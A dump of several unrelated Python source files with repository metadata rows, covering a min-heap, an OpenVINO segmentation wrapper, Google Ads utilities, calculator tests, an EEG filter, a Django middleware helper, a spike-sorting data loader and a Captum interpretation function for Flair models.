    def heapifyDown(self):
        """Sink the root element down until the heap property holds."""
        idx = 0
        while True:
            lc = self.getLeftChild(idx)
            if lc == inf:
                break  # no children at all
            itm = self.arr[idx]
            rc = self.getRightChild(idx)
            if itm <= lc and itm <= rc:
                break
            # Swap with the smaller child to preserve the heap property.
            if lc < rc:
                nidx = self.getLeftChildIdx(idx)
            else:
                nidx = self.getRightChildIdx(idx)
            self.arr[nidx], self.arr[idx] = self.arr[idx], self.arr[nidx]
            idx = nidx

    def add(self, itm):
        """Insert *itm* into the heap."""
        self.arr.append(itm)
        self.heapifyUp()

    def peek(self):
        """Return the smallest element without removing it, or None if empty."""
        if not self.arr:
            return None
        return self.arr[0]

    def poll(self):
        """Remove and return the smallest element, or None if empty."""
        if not self.arr:
            return None
        itm = self.peek()
        # Move the last element to the root, shrink, then restore the
        # heap property from the top.
        last_idx = len(self.arr)-1
        self.arr[last_idx], self.arr[0] = self.arr[0], self.arr[last_idx]
        self.arr.pop()
        self.heapifyDown()
        return itm
# Smoke test: build a min-heap from six values, then poll the minimum
# twice, printing the backing array at each step.
h=Heap()
h.add(5)
h.add(4)
h.add(2)
h.add(1)
h.add(7)
h.add(6)
print(h.arr)
h.poll()
print(h.arr)
| 19.80531 | 75 | 0.597408 |
795c5f110d248676df06ecf04decced731a52947 | 3,682 | py | Python | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | 1 | 2021-01-14T03:33:06.000Z | 2021-01-14T03:33:06.000Z | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | null | null | null | demos/common/python/models/segmentation.py | ermubuzhiming/open_model_zoo | d204db6ae8afcfb9c484047e538692c89d775bf1 | [
"Apache-2.0"
] | null | null | null | """
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cv2
import numpy as np
from .model import Model
from .utils import load_labels
class SegmentationModel(Model):
    """Semantic-segmentation wrapper around an OpenVINO network.

    Expects a single 4-D NCHW 3-channel image input and a single output
    that is either an ArgMax'ed class map (3-D) or per-class scores (4-D).
    """
    def __init__(self, ie, model_path, labels=None):
        super().__init__(ie, model_path)
        self.input_blob_name = self.prepare_inputs()
        self.out_blob_name = self.prepare_outputs()
        if isinstance(labels, (list, tuple)):
            self.labels = labels
        else:
            # Anything truthy that is not a list/tuple is treated as a
            # path to a labels file.
            self.labels = load_labels(labels) if labels else None
    def prepare_inputs(self):
        """Validate the single network input and record its NCHW dimensions.

        Returns the input blob name; raises RuntimeError for unsupported
        topologies.
        """
        if len(self.net.input_info) != 1:
            raise RuntimeError("Demo supports topologies only with 1 input")
        blob_name = next(iter(self.net.input_info))
        blob = self.net.input_info[blob_name]
        blob.precision = "U8"
        blob.layout = "NCHW"
        input_size = blob.input_data.shape
        if len(input_size) == 4 and input_size[1] == 3:
            self.n, self.c, self.h, self.w = input_size
        else:
            raise RuntimeError("3-channel 4-dimensional model's input is expected")
        return blob_name
    def prepare_outputs(self):
        """Validate the single network output and record its channel count.

        ``self.out_channels`` is 0 for a 3-D (already ArgMax'ed) output,
        otherwise the number of class channels.  Returns the output blob
        name.
        """
        if len(self.net.outputs) != 1:
            raise RuntimeError("Demo supports topologies only with 1 output")
        blob_name = next(iter(self.net.outputs))
        blob = self.net.outputs[blob_name]
        out_size = blob.shape
        if len(out_size) == 3:
            self.out_channels = 0
        elif len(out_size) == 4:
            self.out_channels = out_size[1]
        else:
            raise Exception("Unexpected output blob shape {}. Only 4D and 3D output blobs are supported".format(out_size))
        return blob_name
    def preprocess(self, inputs):
        """Resize an HWC image to the network size and lay it out as NCHW.

        Returns ``(feed_dict, meta)``; *meta* records the original and
        resized shapes for use in postprocessing.
        """
        image = inputs
        resized_image = cv2.resize(image, (self.w, self.h))
        meta = {'original_shape': image.shape,
                'resized_shape': resized_image.shape}
        resized_image = resized_image.transpose((2, 0, 1))  # HWC -> CHW
        resized_image = resized_image.reshape((self.n, self.c, self.h, self.w))
        dict_inputs = {self.input_blob_name: resized_image}
        return dict_inputs, meta
    def postprocess(self, outputs, meta):
        """Turn raw output into a uint8 class-index map at the original image size."""
        predictions = outputs[self.out_blob_name].squeeze()
        input_image_height = meta['original_shape'][0]
        input_image_width = meta['original_shape'][1]
        if self.out_channels < 2:  # assume the output is already ArgMax'ed
            result = predictions.astype(np.uint8)
        else:
            # Per-class scores: pick the best class per pixel.
            result = np.argmax(predictions, axis=0).astype(np.uint8)
        result = cv2.resize(result, (input_image_width, input_image_height), 0, 0, interpolation=cv2.INTER_NEAREST)
        return result
class SalientObjectDetectionModel(SegmentationModel):
    """Segmentation variant producing a per-pixel saliency probability map."""

    def postprocess(self, outputs, meta):
        """Apply a sigmoid to the raw map and resize it to the input frame size."""
        height = meta['original_shape'][0]
        width = meta['original_shape'][1]
        saliency = outputs[self.out_blob_name].squeeze()
        # Logits -> probabilities.
        saliency = 1 / (1 + np.exp(-saliency))
        return cv2.resize(saliency, (width, height), 0, 0,
                          interpolation=cv2.INTER_NEAREST)
| 35.747573 | 122 | 0.661597 |
795c5f32f656142b269c042545334a5a99dc9f43 | 3,180 | py | Python | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | google/ads/google_ads/util.py | infectious/google-ads-python | 599541be2ab625c7aeb84b8622a8614a6c1703d9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities for the Google Ads API client library."""
import functools
import re
# This regex matches characters preceded by start of line or an underscore.
_RE_FIND_CHARS_TO_UPPERCASE = re.compile(r"(?:_|^)([a-z])")
class ResourceName:
# As of Google Ads API v1 composite resource names are
# delimited by a "~" character.
_COMPOSITE_DELIMITER = "~"
@classmethod
def format_composite(cls, *arg):
"""Formats any number of ID strings into a single composite string.
Note: this utility does not construct an entire resource name string.
It only formats the composite portion for IDs that are not globally
unique, for example an ad_group_ad.
Args:
arg: Any number of str IDs for resources such as ad_groups or
ad_group_ads.
Returns:
A str of all the given strs concatenated with the compsite
delimiter.
Raises:
TypeError: If anything other than a string is passed in.
"""
return cls._COMPOSITE_DELIMITER.join(arg)
def get_nested_attr(obj, attr, *args):
"""Gets the value of a nested attribute from an object.
Args:
obj: an object to retrieve an attribute value from.
attr: a string of the attribute separated by dots.
Returns:
The object attribute value or the given *args if the attr isn't present.
"""
def _getattr(obj, attr):
return getattr(obj, attr, *args)
return functools.reduce(_getattr, [obj] + attr.split("."))
def convert_upper_case_to_snake_case(string):
"""Converts a string from UpperCase to snake_case.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
new_string = ""
index = 0
for char in string:
if index == 0:
new_string += char.lower()
elif char.isupper():
new_string += f"_{char.lower()}"
else:
new_string += char
index += 1
return new_string
def convert_snake_case_to_upper_case(string):
"""Converts a string from snake_case to UpperCase.
Primarily used to translate module names when retrieving them from version
modules' __init__.py files.
Args:
string: an arbitrary string to convert.
"""
def converter(match):
"""Convert a string to strip underscores then uppercase it."""
return match.group().replace("_", "").upper()
return _RE_FIND_CHARS_TO_UPPERCASE.sub(converter, string)
| 29.444444 | 78 | 0.674214 |
795c5feae0377b5aa1556d88952283b6c346219e | 4,143 | py | Python | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | 1 | 2020-11-03T05:57:48.000Z | 2020-11-03T05:57:48.000Z | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | null | null | null | src/CalculatorTest.py | nt27web/calculator_NK | 6b61e169a2223fee26a78dd8b3186c57800e4bd2 | [
"MIT"
] | null | null | null | import unittest
from Calculator.Calculator import Calculator
from CsvReader.CsvReader import CsvReader
class MyTestCase(unittest.TestCase):
    """Unit tests for Calculator: inline expectations plus CSV-driven fixtures.

    NOTE(review): the inline expectations imply reversed-operand
    semantics — e.g. ``subtract(4, 10) == 6`` and ``divide(5, 20) == 4``
    suggest the second argument is the minuend/dividend — and
    ``divide(5, 0) == 0`` implies division by zero returns 0 rather than
    raising.  Confirm against the Calculator implementation.
    """
    # default test
    def setUp(self) -> None:
        self.calculator = Calculator()
    # instance check test
    def test_instantiate_calculator(self):
        self.assertIsInstance(self.calculator, Calculator)
    # addition method test1
    def test_add_method_calculator_success(self):
        self.assertEqual(self.calculator.add(1.36,2.78), 4.14)
    # addition method test2
    def test_add_method_calculator_zero(self):
        self.assertEqual(self.calculator.add(-1.11, 1.11), 0)
    # subtraction method test1
    def test_subtract_method_calculator_success(self):
        self.assertEqual(self.calculator.subtract(4, 10), 6)
    # subtraction method test2
    def test_subtract_method_calculator_zero(self):
        self.assertEqual(self.calculator.subtract(4, 4), 0)
    # multiplication method test1
    def test_multiply_method_calculator_success(self):
        self.assertEqual(self.calculator.multiply(5, 5), 25)
    # multiplication method test2
    def test_multiply_method_calculator_zero(self):
        self.assertEqual(self.calculator.multiply(5, 0), 0)
    # division method test1
    def test_divide_method_calculator_success(self):
        self.assertEqual(self.calculator.divide(5, 20), 4)
    # division method test2
    def test_divide_method_calculator_zero(self):
        self.assertEqual(self.calculator.divide(5, 0), 0)
    # square method test1
    def test_square_method_calculator_success(self):
        self.assertEqual(self.calculator.square(5), 25)
    # square method test2
    def test_square_method_calculator_negative(self):
        self.assertEqual(self.calculator.square(-5), 25)
    # square root test1
    def test_square_root_method_calculator_success(self):
        self.assertEqual(self.calculator.square_root(25), 5)
    # square root test2 - accurate upto 9 decimal points
    def test_square_root_method_calculator_success_decimal(self):
        self.assertEqual(self.calculator.square_root(39.99), 6.3237647)
    # CSV-driven tests: each fixture row supplies operands and the
    # expected Result; the calculator's stored ``result`` attribute is
    # checked as well as the return value.
    def test_subtraction(self):
        test_data = CsvReader("src/Tests/Data/UnitTestSubtraction.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.subtract(row['Value 1'], row['Value 2']), result)
            self.assertEqual(self.calculator.result, result)
    def test_addition(self):
        test_data = CsvReader("src/Tests/Data/UnitTestAddition.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.add(row['Value 1'], row['Value 2']), result)
            self.assertEqual(self.calculator.result, result)
    def test_multiplication(self):
        test_data = CsvReader("src/Tests/Data/UnitTestMultiplication.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.multiply(row['Value 1'], row['Value 2']), result)
            self.assertEqual(self.calculator.result, result)
    def test_division(self):
        test_data = CsvReader("src/Tests/Data/UnitTestDivision.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.divide(row['Value 1'], row['Value 2']), result)
            self.assertEqual(self.calculator.result, result)
    def test_square(self):
        test_data = CsvReader("src/Tests/Data/UnitTestSquare.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.square(row['Value 1']), result)
            self.assertEqual(self.calculator.result, result)
    def test_square_root(self):
        test_data = CsvReader("src/Tests/Data/UnitTestSquareRoot.csv").data
        for row in test_data:
            result = float(row['Result'])
            self.assertEqual(self.calculator.square_root(row['Value 1']), result)
            self.assertEqual(self.calculator.result, result)
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
795c61cad986baa30e94ce4d7ce11f0a2af14d2d | 642 | py | Python | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | gcpds/filters/spatial_filters/CAR.py | FrankYesid/python-gcpds.filters | f16b1384fb7640320728959f6a1f0fb1410db9f3 | [
"BSD-2-Clause"
] | null | null | null | # common average reference (CAR)
def CAR(subjects):
    """Apply a common average reference (CAR) to every trial of every subject.

    For each sample matrix, the mean across channels (axis 1) is
    subtracted from every channel, i.e. each time sample is re-referenced
    to its own channel average.

    Args:
        subjects: object array of shape (n_subjects, 1); each cell holds
            an object array of shape (n_trials, 1) whose cells are 2-D
            float arrays of shape (n_samples, n_channels).

    Returns:
        The same nested structure with every trial re-referenced.  Note
        that, as in the original code, the input structure is aliased
        (not copied), so the input arrays are modified in place.
    """
    SubjectsCAR = subjects
    for l in range(subjects.shape[0]):
        subject = subjects[l, 0]
        SubjectCAR = subject
        for k in range(subject.shape[0]):
            Sample = subject[k, 0]
            # Broadcasting replaces the original matlib.repmat code,
            # which hard-coded 22 channels and therefore only worked for
            # 22-channel recordings.
            SubjectCAR[k, 0] = Sample - Sample.mean(axis=1, keepdims=True)
        SubjectsCAR[l, 0] = SubjectCAR
    return SubjectsCAR
| 32.1 | 50 | 0.556075 |
795c61cef2f9336f1e4f602957aa26755a0b72c9 | 341 | py | Python | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | null | null | null | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | 13 | 2021-06-10T10:14:05.000Z | 2022-02-10T10:37:03.000Z | dc_utils/settings/whitenoise.py | DemocracyClub/dc_django_utils | ced65815c5d7e65852ed79648546ec37bc41c4f0 | [
"MIT"
] | null | null | null | def whitenoise_add_middleware(MIDDLEWARE):
insert_after = "django.middleware.security.SecurityMiddleware"
index = 0
MIDDLEWARE = list(MIDDLEWARE)
if insert_after in MIDDLEWARE:
index = MIDDLEWARE.index(insert_after) + 1
MIDDLEWARE.insert(index, "whitenoise.middleware.WhiteNoiseMiddleware")
return MIDDLEWARE
| 37.888889 | 74 | 0.756598 |
795c61deaa89b4a0edca183ad2a27dc0c66d9311 | 15,362 | py | Python | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 7 | 2015-01-20T13:55:51.000Z | 2018-02-06T09:31:21.000Z | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 6 | 2015-01-08T18:13:53.000Z | 2016-06-22T09:53:53.000Z | kwiklib/dataio/kwikloader.py | klusta-team/kwiklib | 617a6ceff55957728c3dc94109b64e4c427429c2 | [
"BSD-3-Clause"
] | 8 | 2015-01-22T22:57:19.000Z | 2020-03-19T11:43:56.000Z | """This module provides utility classes and functions to load spike sorting
data sets."""
# -----------------------------------------------------------------------------
# Imports
# -----------------------------------------------------------------------------
import os
import os.path
import shutil
import re
from collections import Counter
import numpy as np
import pandas as pd
import tables as tb
from loader import (Loader, default_group_info, reorder, renumber_clusters,
default_cluster_info)
from klustersloader import (find_filenames, save_clusters, convert_to_clu,
find_filename, find_filename_or_new)
from tools import (load_text, normalize,
load_binary, load_pickle, save_text, get_array,
first_row, load_binary_memmap)
from selection import (select, select_pairs, get_spikes_in_clusters,
get_some_spikes_in_clusters, get_some_spikes, get_indices, pandaize)
from kwiklib.utils.logger import (debug, info, warn, exception, FileLogger,
register, unregister)
from kwiklib.utils.colors import COLORS_COUNT, generate_colors
from kwiklib.dataio.kwik import add_cluster
from kwiklib.dataio.klusterskwik import klusters_to_kwik
from .experiment import Experiment
def add_missing_clusters(exp):
    """Ensure every cluster referenced by spikes exists in the kwik file.

    For each shank, clusters present in the spike->cluster assignments
    but absent from the cluster tables are created with the "Unsorted"
    cluster group (group #3).
    """
    shanks = sorted(exp.channel_groups.keys())
    for shank in shanks:
        cg = exp.channel_groups[shank]
        clusters = cg.clusters.main.keys()
        clusters_unique = np.unique(cg.spikes.clusters.main[:])
        # Find missing clusters in the kwik file.
        missing = sorted(set(clusters_unique)-set(clusters))
        # Add all missing clusters with a default color and "Unsorted" cluster group (group #3).
        for idx in missing:
            info("Adding missing cluster %d in shank %d." % (idx, shank))
            add_cluster(exp._files, channel_group_id='%d' % shank,
                        id=str(idx),
                        clustering='main',
                        cluster_group=3)
# -----------------------------------------------------------------------------
# HDF5 Loader
# -----------------------------------------------------------------------------
class KwikLoader(Loader):
# TODO: change the clustering ('main' by default)
def __init__(self, parent=None, filename=None, userpref=None):
self.experiment = None
super(KwikLoader, self).__init__(parent=parent, filename=filename, userpref=userpref)
# Read functions.
# ---------------
def _report_progress_open(self, spike, nspikes, shank, nshanks):
i = shank * 100 + float(spike)/nspikes*100
n = nshanks * 100
self.report_progress(i, n)
def _consistency_check(self):
exp = self.experiment
chgrp = self.shank
cg = exp.channel_groups[chgrp]
clusters = cg.clusters.main.keys()
clusters_unique = np.unique(cg.spikes.clusters.main[:])
# Find missing clusters in the kwik file.
missing = sorted(set(clusters_unique)-set(clusters))
# Add all missing clusters with a default color and "Unsorted" cluster group (group #3).
for idx in missing:
warn("Consistency check: adding cluster %d in the kwik file" % idx)
add_cluster(exp._files, channel_group_id='%d' % chgrp,
id=idx,
clustering='main',
cluster_group=3)
def open(self, filename=None, shank=None):
"""Open everything."""
if filename is None:
filename = self.filename
else:
self.filename = filename
dir, basename = os.path.split(filename)
# Converting to kwik if needed
# kwik = find_filename(basename, 'kwik', dir=dir)
# xml = find_filename(basename, 'xml', dir=dir)
# self.filename_clu = find_filename(basename, 'clu', dir=dir)
self._filenames = find_filenames(filename)
kwik = find_filename(basename, 'kwik', dir=dir)
xml = self._filenames['xml']
clu = self._filenames['clu']
self.log_filename = find_filename_or_new(filename, 'kvlog', dir=dir)
# Backup the .clu file.
clu_original = find_filename_or_new(filename, 'clu_original')
if os.path.exists(clu) and not os.path.exists(clu_original):
shutil.copyfile(clu, clu_original)
if not kwik:
assert xml, ValueError("I need a valid .kwik file")
return
self.experiment = Experiment(basename, dir=dir, mode='a')
# CONSISTENCY CHECK
# add missing clusters
add_missing_clusters(self.experiment)
# TODO
# self.initialize_logfile()
# Load the similarity measure chosen by the user in the preferences
# file: 'gaussian' or 'kl'.
# Refresh the preferences file when a new file is opened.
# USERPREF.refresh()
self.similarity_measure = self.userpref['similarity_measure'] or 'gaussian'
debug("Similarity measure: {0:s}.".format(self.similarity_measure))
info("Opening {0:s}.".format(self.experiment.name))
self.shanks = sorted(self.experiment.channel_groups.keys())
self.freq = self.experiment.application_data.spikedetekt.sample_rate
self.fetdim = self.experiment.application_data.spikedetekt.n_features_per_channel
self.nsamples = self.experiment.application_data.spikedetekt.extract_s_before + self.experiment.application_data.spikedetekt.extract_s_after
self.set_shank(shank or self.shanks[0])
# Shank functions.
# ----------------
def get_shanks(self):
"""Return the list of shanks available in the file."""
return self.shanks
def set_shank(self, shank):
"""Change the current shank and read the corresponding tables."""
if not shank in self.shanks:
warn("Shank {0:d} is not in the list of shanks: {1:s}".format(
shank, str(self.shanks)))
return
self.shank = shank
# CONSISTENCY CHECK
# self._consistency_check()
self.nchannels = len(self.experiment.channel_groups[self.shank].channels)
clusters = self.experiment.channel_groups[self.shank].spikes.clusters.main[:]
self.clusters = pd.Series(clusters, dtype=np.int32)
self.nspikes = len(self.clusters)
self.features = self.experiment.channel_groups[self.shank].spikes.features
self.masks = self.experiment.channel_groups[self.shank].spikes.masks
self.waveforms = self.experiment.channel_groups[self.shank].spikes.waveforms_filtered
if self.features is not None:
nfet = self.features.shape[1]
self.nextrafet = (nfet - self.nchannels * self.fetdim)
else:
self.nextrafet = 0
# Load concatenated time samples: those are the time samples +
# the start time of the corresponding recordings.
spiketimes = self.experiment.channel_groups[self.shank].spikes.concatenated_time_samples[:] * (1. / self.freq)
self.spiketimes = pd.Series(spiketimes, dtype=np.float64)
self.duration = spiketimes[-1]
self._update_data()
self.read_clusters()
def copy_clustering(self, clustering_from='original',
clustering_to='main'):
clusters = self.experiment.channel_groups[self.shank].spikes.clusters
clusters.copy(clustering_from, clustering_to)
# Read contents.
# ---------------------
def get_probe_geometry(self):
return np.array([c.position
for c in self.experiment.channel_groups[self.shank].channels])
def read_clusters(self):
# Read the cluster info.
clusters = self.experiment.channel_groups[self.shank].clusters.main.keys()
cluster_groups = [c.cluster_group or 0 for c in self.experiment.channel_groups[self.shank].clusters.main.values()]
# cluster_colors = [c.application_data.klustaviewa.color
# if c.application_data.klustaviewa.color is not None
# else 1
# for c in self.experiment.channel_groups[self.shank].clusters.main.values()]
groups = self.experiment.channel_groups[self.shank].cluster_groups.main.keys()
group_names = [g.name or 'Group' for g in self.experiment.channel_groups[self.shank].cluster_groups.main.values()]
# group_colors = [g.application_data.klustaviewa.color or 1 for g in self.experiment.channel_groups[self.shank].cluster_groups.main.values()]
# Create the cluster_info DataFrame.
self.cluster_info = pd.DataFrame(dict(
# color=cluster_colors,
group=cluster_groups,
), index=clusters)
# self.cluster_colors = self.cluster_info['color'].astype(np.int32)
self.cluster_groups = self.cluster_info['group'].astype(np.int32)
# Create the group_info DataFrame.
self.group_info = pd.DataFrame(dict(
# color=group_colors,
name=group_names,
), index=groups)
# self.group_colors = self.group_info['color'].astype(np.int32)
self.group_names = self.group_info['name']
# Writing capabilities.
# ---------------------
def set_cluster(self, spikes, cluster):
if not hasattr(spikes, '__len__'):
spikes = [spikes]
self.experiment.channel_groups[self.shank].spikes.clusters.main[spikes] = cluster
clusters = self.experiment.channel_groups[self.shank].spikes.clusters.main[:]
self.clusters = pd.Series(clusters, dtype=np.int32)
self._update_data()
def set_cluster_groups(self, clusters, group):
# self.cluster_groups.ix[clusters] = group
if not hasattr(clusters, '__len__'):
clusters = [clusters]
clusters_gr = self.experiment.channel_groups[self.shank].clusters.main
for cl in clusters:
clusters_gr[cl].cluster_group = group
self.read_clusters()
def set_cluster_colors(self, clusters, color):
# self.cluster_colors.ix[clusters] = color
if not hasattr(clusters, '__len__'):
clusters = [clusters]
clusters_gr = self.experiment.channel_groups[self.shank].clusters.main
for cl in clusters:
clusters_gr[cl].application_data.klustaviewa.color = color
self.read_clusters()
def set_group_names(self, groups, name):
# self.group_names.ix[groups] = name
if not hasattr(groups, '__len__'):
groups = [groups]
groups_gr = self.experiment.channel_groups[self.shank].cluster_groups.main
for gr in groups:
groups_gr[gr].name = name
self.read_clusters()
def set_group_colors(self, groups, color):
# self.group_colors.ix[groups] = color
if not hasattr(groups, '__len__'):
groups = [groups]
groups_gr = self.experiment.channel_groups[self.shank].cluster_groups.main
# for gr in groups:
# groups_gr[gr].application_data.klustaviewa.color = color
self.read_clusters()
# Add.
def add_cluster(self, cluster, group, color):
# if cluster not in self.cluster_groups.index:
# self.cluster_groups = self.cluster_groups.append(
# pd.Series([group], index=[cluster])).sort_index()
# if cluster not in self.cluster_colors.index:
# self.cluster_colors = self.cluster_colors.append(
# pd.Series([color], index=[cluster])).sort_index()
self.experiment.channel_groups[self.shank].clusters.main.add_cluster(
id=cluster,
# color=color,
cluster_group=group)
self.read_clusters()
def add_clusters(self, clusters, groups):
# if cluster not in self.cluster_groups.index:
# self.cluster_groups = self.cluster_groups.append(
# pd.Series([group], index=[cluster])).sort_index()
# if cluster not in self.cluster_colors.index:
# self.cluster_colors = self.cluster_colors.append(
# pd.Series([color], index=[cluster])).sort_index()
for cluster, group in zip(clusters, groups):
self.experiment.channel_groups[self.shank].clusters.main.add_cluster(
id=cluster, cluster_group=group)
self.read_clusters()
def add_group(self, group, name):
# if group not in self.group_colors.index:
# self.group_colors = self.group_colors.append(
# pd.Series([color], index=[group])).sort_index()
# if group not in self.group_names.index:
# self.group_names = self.group_names.append(
# pd.Series([name], index=[group])).sort_index()
groups = self.experiment.channel_groups[self.shank].cluster_groups.main
groups.add_group(id=group, name=name,)
self.read_clusters()
# Remove.
    def remove_cluster(self, cluster):
        """Remove an empty cluster.

        Raises ValueError if any spike is still assigned to `cluster`
        (i.e. the id appears in `self.clusters`).
        """
        if np.any(np.in1d(cluster, self.clusters)):
            raise ValueError(("Cluster {0:d} is not empty and cannot "
            "be removed.").format(cluster))
        self.experiment.channel_groups[self.shank].clusters.main.remove_cluster(
            id=cluster,)
        self.read_clusters()
    def remove_group(self, group):
        """Remove an empty cluster group.

        Raises ValueError if any cluster still belongs to `group`
        (i.e. the id appears in `self.cluster_groups`).
        """
        if np.any(np.in1d(group, self.cluster_groups)):
            raise ValueError(("Group {0:d} is not empty and cannot "
            "be removed.").format(group))
        self.experiment.channel_groups[self.shank].cluster_groups.main.remove_group(
            id=group,)
        self.read_clusters()
# Access to the data: spikes
# --------------------------
def select(self, spikes=None, clusters=None):
if clusters is not None:
if not hasattr(clusters, '__len__'):
clusters = [clusters]
spikes = get_spikes_in_clusters(clusters, self.clusters)
self.spikes_selected = spikes
self.clusters_selected = clusters
# Log file.
# ---------
    def initialize_logfile(self):
        """Create a file logger at the user-preferred level and register it
        with the logging machinery (unregistered again in `close`)."""
        self.logfile = FileLogger(self.filename_log, name='datafile',
            level=self.userpref['loglevel_file'])
        # Register log file.
        register(self.logfile)
# Save.
# -----
    def save(self, renumber=False):
        """Save the current clustering to the `.clu.<shank>` file.

        If `renumber` is True, clusters are renumbered first and the
        renumbered arrays become the live ones. Progress is reported in
        four steps; the reopen of the kwik file (steps 2-4) is commented
        out — presumably no longer needed, confirm before re-enabling.
        """
        self.report_progress_save(1, 4)

        if renumber:
            self.renumber()
            self.clusters = self.clusters_renumbered
            self.cluster_info = self.cluster_info_renumbered
            self._update_data()

        # Save the clusters in the .clu file.
        # The .clu filename is derived by replacing the extension with the
        # shank number, e.g. "data.clu" -> "data.<shank>".
        clu = self._filenames['clu']
        clu_split = clu.split('.')
        clu_split[-1] = str(self.shank)
        clu = '.'.join(clu_split)
        save_clusters(clu,
            convert_to_clu(self.clusters, self.cluster_info['group']))

        self.report_progress_save(2, 4)
        # self.close()
        self.report_progress_save(3, 4)
        # self.open()
        self.report_progress_save(4, 4)
# Close functions.
# ----------------
    def close(self):
        """Close the kwik HDF5 file.

        Closes the underlying experiment (if open) and unregisters the
        file logger created in `initialize_logfile`. Safe to call when
        nothing is open.
        """
        # Legacy direct-HDF5 close path, kept for reference:
        # if hasattr(self, 'kwik') and self.kwik.isopen:
            # self.kwik.flush()
            # self.kwik.close()
        if self.experiment is not None:
            self.experiment.close()
            self.experiment = None
        if hasattr(self, 'logfile'):
            unregister(self.logfile)
| 37.837438 | 149 | 0.622315 |
795c62eeb29f6d2d2e3e67921969c108b228e910 | 5,152 | py | Python | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 10 | 2020-12-18T03:22:31.000Z | 2021-09-06T20:07:51.000Z | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 7 | 2020-11-21T22:10:20.000Z | 2021-05-13T12:45:19.000Z | interpretation_package/.ipynb_checkpoints/interpret_flair-checkpoint.py | krzysztoffiok/interpret-flair | 2f1911213cfe78a41b5c176d1d4303ef888718b7 | [
"MIT"
] | 3 | 2021-05-13T07:52:49.000Z | 2021-12-27T15:14:01.000Z | import torch
import torch.nn as nn
from flair.data import Sentence
from captum.attr import (
LayerIntegratedGradients
)
from captum.attr import visualization as viz
def interpret_sentence(flair_model_wrapper, lig, sentence, target_label, visualization_list, n_steps=100, estimation_method="gausslegendre",internal_batch_size=None):
    """
    We can visualise the attributions made by making use of Pytorch Captum.

    Inputs:
    flair_model_wrapper: class containing a customized forward function of Flair model.
    lig: the layer integrated gradient object.
    sentence: the Flair sentence-object we want to interpret.
    target_label: the ground truth class-label of the sentence.
    visualization_list: a list to store the visualization records in.
    n_steps: number of integration steps used by integrated gradients.
    estimation_method: integral approximation method passed to Captum
        (e.g. "gausslegendre" or "riemann_right").
    internal_batch_size: optional batch size used internally by Captum to
        limit memory while integrating.

    Outputs:
    readable_tokens: the cleaned-up subword tokens of the sentence.
    word_attributions: per-token attribution scores w.r.t. target_label.
    convergence_delta: absolute convergence delta of the approximation.
    """
    # Return the target index from the label dictionary.
    target_index = flair_model_wrapper.label_dictionary.get_idx_for_item(target_label)

    # In order maintain consistency with Flair, we apply the same tokenization
    # steps.
    flair_sentence = Sentence(sentence)
    tokenized_sentence = flair_sentence.to_tokenized_string()

    # This calculates the token input IDs tensor for the model.
    input_ids = flair_model_wrapper.tokenizer.encode(tokenized_sentence,
                                                     add_special_tokens=False,
                                                     max_length=flair_model_wrapper.tokenizer.model_max_length,
                                                     truncation=True,
                                                     return_tensors="pt")

    # Create a baseline by creating a tensor of equal length
    # containing the padding token tensor id.
    # NOTE(review): this uses token id 1 for every position — presumably the
    # tokenizer's pad id; confirm for the tokenizer in use.
